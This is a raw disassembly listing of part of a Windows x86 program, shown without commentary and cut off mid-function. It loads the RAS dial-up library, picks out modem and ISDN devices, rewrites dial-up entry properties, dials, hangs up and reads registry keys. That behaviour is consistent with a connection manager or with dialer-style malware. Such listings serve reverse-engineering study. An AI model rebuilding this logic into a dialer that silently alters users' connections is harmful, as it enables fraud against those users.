xor edi, edi
cmp eax, edi
mov [esi+5FCh], edi
mov [esi+600h], edi
jz short loc_4093E6
lea ecx, [esp+10h+var_4]
push ecx
lea edx, [esp+14h+Size]
push edx
push edi
mov [esp+1Ch+Size], edi
call eax
cmp [esp+10h+var_4], edi
jnz short loc_4093EF
loc_4093E6: ; CODE XREF: sub_4093B0+1D�j
pop edi
or eax, 0FFFFFFFFh
pop esi
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_4093EF: ; CODE XREF: sub_4093B0+34�j
mov eax, [esp+10h+Size]
push eax ; Size
call _malloc
add esp, 4
cmp eax, edi
mov [esi+600h], eax
jnz short loc_409411
pop edi
mov eax, 298h
pop esi
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_409411: ; CODE XREF: sub_4093B0+54�j
lea ecx, [esp+10h+var_4]
push ecx
lea edx, [esp+14h+Size]
mov dword ptr [eax], 98h
mov eax, [esi+600h]
push edx
push eax
call dword ptr [esi+5D8h]
test eax, eax
jz short loc_409447
mov ecx, [esi+600h]
push ecx ; Memory
call j__free
add esp, 4
mov [esi+600h], edi
loc_409447: ; CODE XREF: sub_4093B0+80�j
mov edx, [esp+10h+var_4]
pop edi
mov [esi+5FCh], edx
xor eax, eax
pop esi
add esp, 8
retn
sub_4093B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409460 proc near ; CODE XREF: sub_407D40+3A3�p
mov eax, [ecx+5FCh]
retn
sub_409460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409470 proc near ; CODE XREF: sub_407D40+415�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jl short loc_409493
cmp eax, [ecx+5FCh]
jge short loc_409493
mov ecx, [ecx+600h]
imul eax, 98h
lea eax, [ecx+eax+15h]
retn 4
; ---------------------------------------------------------------------------
loc_409493: ; CODE XREF: sub_409470+6�j
; sub_409470+E�j
xor eax, eax
retn 4
sub_409470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4094A0 proc near ; CODE XREF: sub_407D40+3DA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jl short loc_4094C3
cmp eax, [ecx+5FCh]
jge short loc_4094C3
mov ecx, [ecx+600h]
imul eax, 98h
lea eax, [ecx+eax+4]
retn 4
; ---------------------------------------------------------------------------
loc_4094C3: ; CODE XREF: sub_4094A0+6�j
; sub_4094A0+E�j
xor eax, eax
retn 4
sub_4094A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4094D0 proc near ; CODE XREF: sub_405F00+45�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, ecx
mov eax, [esi+5FCh]
xor ebx, ebx
test eax, eax
push edi
jle short loc_409517
mov ebp, [esp+10h+arg_0]
xor edi, edi
jmp short loc_4094F0
; ---------------------------------------------------------------------------
align 10h
loc_4094F0: ; CODE XREF: sub_4094D0+18�j
; sub_4094D0+45�j
mov eax, [esi+600h]
lea ecx, [edi+eax+15h]
push ecx
push ebp
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jz short loc_409521
mov eax, [esi+5FCh]
inc ebx
add edi, 98h
cmp ebx, eax
jl short loc_4094F0
loc_409517: ; CODE XREF: sub_4094D0+10�j
pop edi
pop esi
pop ebp
or eax, 0FFFFFFFFh
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_409521: ; CODE XREF: sub_4094D0+34�j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn 4
sub_4094D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409530 proc near ; CODE XREF: sub_407D40+326�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi+5E4h]
test eax, eax
jnz short loc_409546
mov eax, 278h
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_409546: ; CODE XREF: sub_409530+B�j
mov eax, [esi+8Ch]
test eax, eax
jz short loc_409563
push eax ; Memory
call _free
add esp, 4
mov dword ptr [esi+8Ch], 0
loc_409563: ; CODE XREF: sub_409530+1E�j
mov eax, [esp+4+arg_0]
push ebx
push ebp
push 101h
push eax
lea ebp, [esi+98h]
push ebp
call ds:dword_40F09C ; lstrcpyn
push 0
push 0
lea ebx, [esi+90h]
push ebx
push 0
push ebp
push 0
mov dword ptr [ebx], 0
call dword ptr [esi+5E4h]
test eax, eax
jz short loc_4095C9
push 0
push 0
push ebx
push 0
push (offset a?+2)
push 0
mov dword ptr [ebx], 0
call dword ptr [esi+5E4h]
cmp eax, 25Bh
jz short loc_4095C9
pop ebp
mov dword ptr [ebx], 0
pop ebx
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4095C9: ; CODE XREF: sub_409530+6A�j
; sub_409530+8B�j
mov ecx, [ebx]
push edi
push ecx ; Size
call _malloc
mov edi, eax
add esp, 4
test edi, edi
mov [esi+8Ch], edi
jnz short loc_4095EF
pop edi
pop ebp
mov [ebx], eax
pop ebx
mov eax, 298h
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4095EF: ; CODE XREF: sub_409530+AF�j
mov ecx, [ebx]
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
push 0
and ecx, 3
rep stosb
mov eax, [esi+8Ch]
mov ecx, [ebx]
push 0
push ebx
mov [eax], ecx
mov edx, [esi+8Ch]
push edx
push ebp
push 0
call dword ptr [esi+5E4h]
test eax, eax
jz short loc_40966B
mov eax, [esi+8Ch]
push 0
push 0
push ebx
push eax
push (offset a?+2)
push 0
call dword ptr [esi+5E4h]
mov edi, eax
test edi, edi
jz short loc_40966B
mov ecx, [esi+8Ch]
push ecx ; Memory
call _free
add esp, 4
mov eax, edi
pop edi
pop ebp
mov dword ptr [ebx], 0
pop ebx
mov dword ptr [esi+8Ch], 0
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40966B: ; CODE XREF: sub_409530+F2�j
; sub_409530+111�j
mov edx, [esi+8Ch]
mov dword ptr [edx+4], 218h
mov eax, [esi+8Ch]
mov dword ptr [eax+0B8h], 4
mov ecx, [esi+8Ch]
mov dword ptr [ecx+0BCh], 1
mov edx, [esi+8Ch]
push 81h
push offset asc_40FB1C ; " "
add edx, 1Bh
push edx
call ds:dword_40F09C ; lstrcpyn
pop edi
pop ebp
pop ebx
xor eax, eax
pop esi
retn 4
sub_409530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4096C0 proc near ; CODE XREF: sub_405F00+67�p
; sub_407D40+394�p ...
mov eax, [ecx+8Ch]
add eax, 3DDh
retn
sub_4096C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4096D0 proc near ; CODE XREF: sub_407D40+51F�p
lea eax, [ecx+4]
retn
sub_4096D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4096E0 proc near ; CODE XREF: sub_406390+150�p
; sub_407820+12E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
push edi
push 4
mov edi, ecx
push eax
lea esi, [edi+4]
push esi
call ds:dword_40F09C ; lstrcpyn
push esi
lea ebx, [edi+199h]
push ebx
call ds:dword_40F0A0 ; lstrcpy
push esi
call ds:dword_40F084 ; lstrlen
test eax, eax
mov esi, ds:dword_40F0A8
jle short loc_40971D
push offset asc_40FB20 ; ","
push ebx
call esi ; lstrcat
loc_40971D: ; CODE XREF: sub_4096E0+33�j
add edi, 9
push edi
push ebx
call esi ; lstrcat
pop edi
pop esi
pop ebx
retn 4
sub_4096E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409730 proc near ; CODE XREF: sub_406390+165�p
; sub_408350+481�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
push edi
push 80h
mov esi, ecx
push eax
lea ebx, [esi+9]
push ebx
call ds:dword_40F09C ; lstrcpyn
lea edi, [esi+4]
push edi
add esi, 199h
push esi
call ds:dword_40F0A0 ; lstrcpy
push edi
call ds:dword_40F084 ; lstrlen
test eax, eax
mov edi, ds:dword_40F0A8
jle short loc_409773
push offset asc_40FB20 ; ","
push esi
call edi ; lstrcat
loc_409773: ; CODE XREF: sub_409730+39�j
push ebx
push esi
call edi ; lstrcat
pop edi
pop esi
pop ebx
retn 4
sub_409730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409780 proc near ; CODE XREF: sub_406390+12B�p
; sub_408350+457�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 100h
push eax
add ecx, 29Bh
push ecx
call ds:dword_40F09C ; lstrcpyn
retn 4
sub_409780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4097A0 proc near ; CODE XREF: sub_406390+140�p
; sub_408350+46C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 100h
push eax
add ecx, 39Ch
push ecx
call ds:dword_40F09C ; lstrcpyn
retn 4
sub_4097A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4097C0 proc near ; CODE XREF: sub_405EB0+2A�p
; sub_408350+50�p ...
var_120 = dword ptr -120h
arg_0 = dword ptr 4
sub esp, 120h
push esi
mov esi, ecx
mov eax, [esi+4B8h]
test eax, eax
mov dword ptr [esi+5C8h], 0FFFFFFFFh
jz short loc_409848
push ebp
push edi
push eax
call dword ptr [esi+5ECh]
mov ecx, [esi+4B8h]
lea eax, [esp+12Ch+var_120]
push eax
push ecx
mov [esp+134h+var_120], 120h
call dword ptr [esi+5F4h]
cmp eax, 6
jz short loc_40983C
mov edi, ds:dword_40F0D4
mov ebp, [esp+12Ch+arg_0]
loc_409812: ; CODE XREF: sub_4097C0+7A�j
mov edx, ebp
dec ebp
test edx, edx
jz short loc_409846
push 1
call edi ; Sleep
mov ecx, [esi+4B8h]
lea eax, [esp+12Ch+var_120]
push eax
push ecx
mov [esp+134h+var_120], 120h
call dword ptr [esi+5F4h]
cmp eax, 6
jnz short loc_409812
loc_40983C: ; CODE XREF: sub_4097C0+43�j
mov dword ptr [esi+4B8h], 0
loc_409846: ; CODE XREF: sub_4097C0+57�j
pop edi
pop ebp
loc_409848: ; CODE XREF: sub_4097C0+1B�j
pop esi
add esp, 120h
retn 4
sub_4097C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409860 proc near ; CODE XREF: sub_408350+BC�p
var_2C08 = dword ptr -2C08h
var_2C04 = dword ptr -2C04h
var_2C00 = dword ptr -2C00h
var_2BFC = byte ptr -2BFCh
mov eax, 2C08h
call __alloca_probe
push ebx
lea eax, [esp+2C0Ch+var_2C08]
mov ebx, ecx
push eax
lea ecx, [esp+2C10h+var_2C04]
push ecx
lea edx, [esp+2C14h+var_2C00]
push edx
mov [esp+2C18h+var_2C04], 2C00h
mov [esp+2C18h+var_2C00], 2C0h
call dword ptr [ebx+5F0h]
test eax, eax
jz short loc_4098A0
xor al, al
pop ebx
add esp, 2C08h
retn
; ---------------------------------------------------------------------------
loc_4098A0: ; CODE XREF: sub_409860+34�j
mov eax, [esp+2C0Ch+var_2C08]
push esi
xor esi, esi
test eax, eax
jbe short loc_4098C9
push edi
lea edi, [esp+2C14h+var_2BFC]
loc_4098B0: ; CODE XREF: sub_409860+66�j
mov eax, [edi]
push eax
call dword ptr [ebx+5ECh]
mov eax, [esp+2C14h+var_2C08]
inc esi
add edi, 2C0h
cmp esi, eax
jb short loc_4098B0
pop edi
loc_4098C9: ; CODE XREF: sub_409860+49�j
pop esi
mov al, 1
pop ebx
add esp, 2C08h
retn
sub_409860 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4098E0 proc near ; CODE XREF: sub_408350+26�p
; sub_408350+4E1�p
push esi
mov esi, ecx
mov eax, [esi+5CCh]
test eax, eax
jz short loc_409904
cmp eax, 1
jle short loc_409900
cmp eax, 3
jg short loc_409900
call _clock
mov ecx, eax
jmp short loc_40990A
; ---------------------------------------------------------------------------
loc_409900: ; CODE XREF: sub_4098E0+10�j
; sub_4098E0+15�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_409904: ; CODE XREF: sub_4098E0+B�j
mov ecx, [esi+5D4h]
loc_40990A: ; CODE XREF: sub_4098E0+1E�j
sub ecx, [esi+5D0h]
mov eax, 10624DD3h
imul ecx
sar edx, 6
mov eax, edx
shr eax, 1Fh
add eax, edx
pop esi
retn
sub_4098E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409930 proc near ; CODE XREF: sub_408350+ED�p
var_2C08 = dword ptr -2C08h
var_2C04 = dword ptr -2C04h
var_2C00 = dword ptr -2C00h
mov eax, 2C08h
call __alloca_probe
lea eax, [esp+2C08h+var_2C08]
push eax
lea edx, [esp+2C0Ch+var_2C04]
push edx
lea eax, [esp+2C10h+var_2C00]
push eax
mov [esp+2C14h+var_2C04], 2C00h
mov [esp+2C14h+var_2C00], 2C0h
call dword ptr [ecx+5F0h]
test eax, eax
jz short loc_40996C
or eax, 0FFFFFFFFh
add esp, 2C08h
retn
; ---------------------------------------------------------------------------
loc_40996C: ; CODE XREF: sub_409930+30�j
mov eax, [esp+2C08h+var_2C08]
add esp, 2C08h
retn
sub_409930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409980 proc near ; CODE XREF: sub_407D40+30E�p
mov al, 1
mov [ecx+4BDh], al
retn
sub_409980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409990 proc near ; CODE XREF: sub_407D40+228�p
push esi
mov esi, ecx
call sub_409340
mov eax, esi
pop esi
retn
sub_409990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4099A0 proc near ; CODE XREF: sub_407D40+23C�p
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4099B0
push eax
call ds:dword_40F0C8 ; FreeLibrary
loc_4099B0: ; CODE XREF: sub_4099A0+7�j
push offset aRasapi32_dll ; "RASAPI32.DLL"
call ds:dword_40F0E0 ; LoadLibraryA
test eax, eax
mov [esi], eax
jz loc_409ABE
push edi
mov edi, ds:dword_40F0DC
push offset aRasenumdevices ; "RasEnumDevicesA"
push eax
call edi ; GetProcAddress
mov [esi+5D8h], eax
mov eax, [esi]
push offset aRasdiala ; "RasDialA"
push eax
call edi ; GetProcAddress
mov ecx, [esi]
push offset aRasgeterrorstr ; "RasGetErrorStringA"
push ecx
mov [esi+5DCh], eax
call edi ; GetProcAddress
mov edx, [esi]
push offset aRasgetentrypro ; "RasGetEntryPropertiesA"
push edx
mov [esi+5E0h], eax
call edi ; GetProcAddress
mov [esi+5E4h], eax
mov eax, [esi]
push offset aRassetentrypro ; "RasSetEntryPropertiesA"
push eax
call edi ; GetProcAddress
mov ecx, [esi]
push offset aRashangupa ; "RasHangUpA"
push ecx
mov [esi+5E8h], eax
call edi ; GetProcAddress
mov edx, [esi]
push offset aRasenumconnect ; "RasEnumConnectionsA"
push edx
mov [esi+5ECh], eax
call edi ; GetProcAddress
mov [esi+5F0h], eax
mov eax, [esi]
push offset aRasgetconnects ; "RasGetConnectStatusA"
push eax
call edi ; GetProcAddress
mov ecx, [esi]
push offset aRassetentrydia ; "RasSetEntryDialParamsA"
push ecx
mov [esi+5F4h], eax
call edi ; GetProcAddress
mov ecx, [esi+5D8h]
test ecx, ecx
mov [esi+5F8h], eax
pop edi
jz short loc_409ABE
mov ecx, [esi+5DCh]
test ecx, ecx
jz short loc_409ABE
mov ecx, [esi+5E0h]
test ecx, ecx
jz short loc_409ABE
mov ecx, [esi+5E4h]
test ecx, ecx
jz short loc_409ABE
mov ecx, [esi+5E8h]
test ecx, ecx
jz short loc_409ABE
mov ecx, [esi+5ECh]
test ecx, ecx
jz short loc_409ABE
mov ecx, [esi+5F0h]
test ecx, ecx
jz short loc_409ABE
mov ecx, [esi+5F4h]
test ecx, ecx
jz short loc_409ABE
test eax, eax
jz short loc_409ABE
mov ecx, esi
call sub_4093B0
neg eax
sbb al, al
inc al
pop esi
retn
; ---------------------------------------------------------------------------
loc_409ABE: ; CODE XREF: sub_4099A0+1F�j
; sub_4099A0+C3�j ...
xor al, al
pop esi
retn
sub_4099A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409AD0 proc near ; CODE XREF: sub_405F00+93�p
; sub_407D40+44A�p ...
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
test ebp, ebp
push esi
push edi
mov edi, ecx
jl loc_409B6F
cmp ebp, [edi+5FCh]
jge loc_409B6F
mov eax, [edi+600h]
mov esi, ebp
imul esi, 98h
lea ebx, [eax+esi+4]
test ebx, ebx
jz short loc_409B6F
push offset aModem ; "modem"
push ebx
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jz short loc_409B24
push offset aIsdn ; "isdn"
push ebx
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jnz short loc_409B6F
loc_409B24: ; CODE XREF: sub_409AD0+42�j
cmp ebp, [edi+5FCh]
jge short loc_409B38
mov ecx, [edi+600h]
lea eax, [ecx+esi+15h]
jmp short loc_409B3A
; ---------------------------------------------------------------------------
loc_409B38: ; CODE XREF: sub_409AD0+5A�j
xor eax, eax
loc_409B3A: ; CODE XREF: sub_409AD0+66�j
mov edx, [edi+8Ch]
mov esi, ds:dword_40F09C
push 81h
push eax
add edx, 3DDh
push edx
call esi ; lstrcpyn
mov eax, [edi+8Ch]
push 11h
push ebx
add eax, 3CCh
push eax
call esi ; lstrcpyn
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_409B6F: ; CODE XREF: sub_409AD0+C�j
; sub_409AD0+18�j ...
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 4
sub_409AD0 endp
; ---------------------------------------------------------------------------
align 10h
loc_409B80: ; DATA XREF: sub_409D70+49�o
mov ecx, dword_41253C
mov eax, [ecx+5C0h]
inc eax
cmp eax, 20h
jl short loc_409B94
xor eax, eax
loc_409B94: ; CODE XREF: .text:00409B90�j
mov edx, [esp+8]
mov [ecx+eax*8+4C0h], edx
mov edx, [esp+0Ch]
mov [ecx+eax*8+4C4h], edx
mov [ecx+5C0h], eax
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409BC0 proc near ; CODE XREF: sub_405EB0+13�p
; sub_408350+10C�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
arg_0 = dword ptr 4
sub esp, 120h
push esi
mov esi, ecx
mov eax, [esi+5C4h]
cmp [esi+5C0h], eax
push edi
jz short loc_409C41
inc eax
cmp eax, 20h
jl short loc_409BE0
xor eax, eax
loc_409BE0: ; CODE XREF: sub_409BC0+1C�j
mov ecx, [esi+eax*8+4C4h]
mov edx, [esp+128h+arg_0]
mov [edx], ecx
mov edi, [esi+eax*8+4C0h]
mov [esi+5C8h], eax
mov [esi+5C4h], eax
mov eax, edi
sub eax, 2000h
jz short loc_409C2D
dec eax
jnz short loc_409C34
mov eax, [esi+5CCh]
test eax, eax
jz short loc_409C34
mov ecx, esi
call sub_409300
mov eax, edi
pop edi
pop esi
add esp, 120h
retn 4
; ---------------------------------------------------------------------------
loc_409C2D: ; CODE XREF: sub_409BC0+4A�j
mov byte ptr [esi+4BCh], 1
loc_409C34: ; CODE XREF: sub_409BC0+4D�j
; sub_409BC0+57�j
mov eax, edi
pop edi
pop esi
add esp, 120h
retn 4
; ---------------------------------------------------------------------------
loc_409C41: ; CODE XREF: sub_409BC0+16�j
mov ecx, [esi+4B8h]
test ecx, ecx
jnz short loc_409C68
mov eax, [esp+128h+arg_0]
pop edi
mov dword ptr [eax], 0
mov eax, 2001h
pop esi
add esp, 120h
retn 4
; ---------------------------------------------------------------------------
loc_409C68: ; CODE XREF: sub_409BC0+89�j
test eax, eax
jge short loc_409C89
mov ecx, [esp+128h+arg_0]
pop edi
mov dword ptr [ecx], 0
mov eax, 2001h
pop esi
add esp, 120h
retn 4
; ---------------------------------------------------------------------------
loc_409C89: ; CODE XREF: sub_409BC0+AA�j
mov edx, [esi+5C8h]
mov ecx, [esi+edx*8+4C4h]
mov edi, [esp+128h+arg_0]
mov [edi], ecx
mov eax, [esi+5C8h]
mov eax, [esi+eax*8+4C0h]
cmp eax, 2000h
jz short loc_409CC2
cmp eax, 2001h
jz short loc_409CC2
test ecx, ecx
jz loc_409D5E
loc_409CC2: ; CODE XREF: sub_409BC0+F1�j
; sub_409BC0+F8�j
mov edx, [esi+4B8h]
lea ecx, [esp+128h+var_120]
push ecx
push edx
mov [esp+130h+var_120], 120h
call dword ptr [esi+5F4h]
cmp eax, 6
jnz short loc_409D31
push 0BB8h
mov ecx, esi
call sub_4097C0
mov eax, [esi+4B8h]
test eax, eax
jz short loc_409D01
mov dword ptr [esi+4B8h], 0
loc_409D01: ; CODE XREF: sub_409BC0+135�j
cmp dword ptr [esi+5CCh], 3
jnz short loc_409D11
mov ecx, esi
call sub_409300
loc_409D11: ; CODE XREF: sub_409BC0+148�j
mov dword ptr [esi+5C8h], 0FFFFFFFFh
mov dword ptr [edi], 0
pop edi
mov eax, 2001h
pop esi
add esp, 120h
retn 4
; ---------------------------------------------------------------------------
loc_409D31: ; CODE XREF: sub_409BC0+11F�j
cmp dword ptr [esi+5CCh], 1
jnz short loc_409D4C
mov eax, [esp+128h+var_11C]
cmp eax, 2000h
jnz short loc_409D5E
mov ecx, esi
call sub_4092E0
loc_409D4C: ; CODE XREF: sub_409BC0+178�j
mov eax, [esp+128h+var_11C]
cmp eax, 2000h
jnz short loc_409D5E
mov byte ptr [esi+4BCh], 1
loc_409D5E: ; CODE XREF: sub_409BC0+FC�j
; sub_409BC0+183�j ...
pop edi
pop esi
add esp, 120h
retn 4
sub_409BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409D70 proc near ; CODE XREF: sub_408350+216�p
var_4 = byte ptr -4
push ecx
push esi
push 0BB8h
mov esi, ecx
call sub_4097C0
lea eax, [esp+8+var_4]
push eax
mov ecx, esi
call sub_409BC0
cmp eax, 2001h
jz short loc_409DB0
push edi
mov edi, ds:dword_40F0D4
loc_409D98: ; CODE XREF: sub_409D70+3D�j
push 1
call edi ; Sleep
lea ecx, [esp+0Ch+var_4]
push ecx
mov ecx, esi
call sub_409BC0
cmp eax, 2001h
jnz short loc_409D98
pop edi
loc_409DB0: ; CODE XREF: sub_409D70+1F�j
xor eax, eax
lea edx, [esi+4B8h]
push edx
push offset loc_409B80
push eax
lea ecx, [esi+94h]
push ecx
push eax
push eax
mov dword ptr [esi+5CCh], 1
mov [esi+5D0h], eax
mov [esi+5D4h], eax
mov dword_41253C, esi
mov [esi+5C4h], eax
mov [esi+5C0h], eax
mov dword ptr [esi+5C8h], 0FFFFFFFFh
call dword ptr [esi+5DCh]
pop esi
pop ecx
retn
sub_409D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409E10 proc near ; CODE XREF: sub_407D40+5A8�p
; sub_408350+1D3�p ...
var_2C = dword ptr -2Ch
Memory = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
sub esp, 2Ch
push ebx
push esi
mov esi, ecx
mov al, [esi+4BDh]
xor ebx, ebx
cmp al, bl
jz loc_409ECF
lea eax, [esi+98h]
push eax
lea ecx, [esp+38h+var_2C]
mov [esp+38h+var_2C], ebx
mov [esp+38h+Memory], ebx
mov [esp+38h+var_24], ebx
mov [esp+38h+var_20], bl
mov [esp+38h+var_2], bl
call sub_402310
mov ecx, off_4120C4
mov edx, off_4120C0
push 1
push ecx
push edx
lea ecx, [esp+40h+var_2C]
call sub_40A040
mov eax, off_4120C8
mov ecx, off_4120C0
push 1
push eax
push ecx
lea ecx, [esp+40h+var_2C]
call sub_40A040
cmp [esi+4BCh], bl
jz short loc_409EAF
mov eax, [esi+8Ch]
push 80h
lea edx, [esi+199h]
push edx
add eax, 1Bh
push eax
call ds:dword_40F09C ; lstrcpyn
push ebx
lea ecx, [esi+94h]
push ecx
push ebx
call dword ptr [esi+5F8h]
loc_409EAF: ; CODE XREF: sub_409E10+72�j
mov eax, [esp+34h+Memory]
cmp eax, ebx
jz short loc_409EC4
push eax ; Memory
call _free
add esp, 4
mov [esp+34h+Memory], ebx
loc_409EC4: ; CODE XREF: sub_409E10+A5�j
mov edx, [esp+34h+var_2C]
push edx
call ds:dword_40F194
loc_409ECF: ; CODE XREF: sub_409E10+11�j
mov eax, [esi+90h]
mov ecx, [esi+8Ch]
push ebx
push ebx
push eax
push ecx
lea edx, [esi+98h]
push edx
push ebx
call dword ptr [esi+5E8h]
pop esi
pop ebx
add esp, 2Ch
retn
sub_409E10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409F00 proc near ; CODE XREF: sub_406580+3B�p
; sub_4065D0+AD�p
var_200 = byte ptr -200h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 200h
mov edx, [esp+200h+arg_4]
push esi
push 200h
lea eax, [esp+208h+var_200]
push eax
push edx
mov [esp+210h+var_200], 0
call dword ptr [ecx+5E0h]
mov esi, [esp+204h+arg_8]
lea eax, [esp+204h+var_200]
push eax
mov ecx, esi
call sub_402310
push esi
mov esi, [esp+208h+arg_0]
mov ecx, esi
call sub_406190
mov eax, esi
pop esi
add esp, 200h
retn 0Ch
sub_409F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409F60 proc near ; CODE XREF: sub_4030B0+5F�p
; .text:00403205�p ...
push ebx
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
push edi
jnz short loc_409F6F
xor ebx, ebx
jmp short loc_409F78
; ---------------------------------------------------------------------------
loc_409F6F: ; CODE XREF: sub_409F60+9�j
push eax
call ds:dword_40F188
mov ebx, eax
loc_409F78: ; CODE XREF: sub_409F60+D�j
mov eax, [esi+8]
lea edi, [ebx+1]
cmp eax, edi
ja short loc_409FA9
mov eax, [esi+4]
test eax, eax
jz short loc_409F92
push eax ; Memory
call _free
add esp, 4
loc_409F92: ; CODE XREF: sub_409F60+27�j
push edi ; Size
mov [esi+8], edi
call _malloc
add esp, 4
test eax, eax
mov [esi+4], eax
jnz short loc_409FA9
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_409FA9: ; CODE XREF: sub_409F60+20�j
; sub_409F60+43�j
mov eax, [esi+4]
push 0
push 0
mov byte ptr [eax], 0
mov ecx, [esi+8]
mov edx, [esi+4]
mov eax, [esi]
push ecx
push edx
push ebx
push eax
push 0
push 0
call ds:dword_40F03C ; WideCharToMultiByte
mov ecx, [esi+4]
mov byte ptr [ebx+ecx], 0
mov eax, [esi+4]
pop edi
pop esi
pop ebx
retn
sub_409F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409FE0 proc near ; CODE XREF: sub_40A3B0+28�p
; sub_40A3B0+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_8]
push edi
mov esi, ecx
call ds:dword_40F0E0 ; LoadLibraryA
test eax, eax
mov ebx, [esp+0Ch+arg_0]
mov [ebx], eax
jz short loc_40A019
push offset aShgetfolderpat ; "SHGetFolderPathA"
push eax
call ds:dword_40F0DC ; GetProcAddress
test eax, eax
mov ecx, [esp+0Ch+arg_4]
mov [ecx], eax
jnz short loc_40A021
mov edx, [ebx]
push edx
call ds:dword_40F0C8 ; FreeLibrary
loc_40A019: ; CODE XREF: sub_409FE0+18�j
pop edi
pop esi
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A021: ; CODE XREF: sub_409FE0+2E�j
push 1Dh
push edi
add esi, 0Ch
push esi
call ds:dword_40F09C ; lstrcpyn
pop edi
pop esi
mov al, 1
pop ebx
retn 0Ch
sub_409FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A040 proc near ; CODE XREF: sub_409E10+4F�p
; sub_409E10+67�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov al, byte ptr [esp+arg_8]
test al, al
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, ds:dword_40F00C
mov ebx, ecx
jnz short loc_40A0A7
lea eax, [esp+10h+arg_8]
push eax
push 20019h
push 0
push esi
push 80000001h
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_40A093
mov ecx, [esp+10h+arg_8]
push eax
push eax
push eax
push eax
push ebp
push ecx
call ds:dword_40F01C ; RegQueryValueExA
test eax, eax
jz short loc_40A09C
mov edx, [esp+10h+arg_8]
push edx
call ds:dword_40F020 ; RegCloseKey
loc_40A093: ; CODE XREF: sub_40A040+32�j
; sub_40A040+7D�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A09C: ; CODE XREF: sub_40A040+46�j
mov eax, [esp+10h+arg_8]
push eax
call ds:dword_40F020 ; RegCloseKey
loc_40A0A7: ; CODE XREF: sub_40A040+1A�j
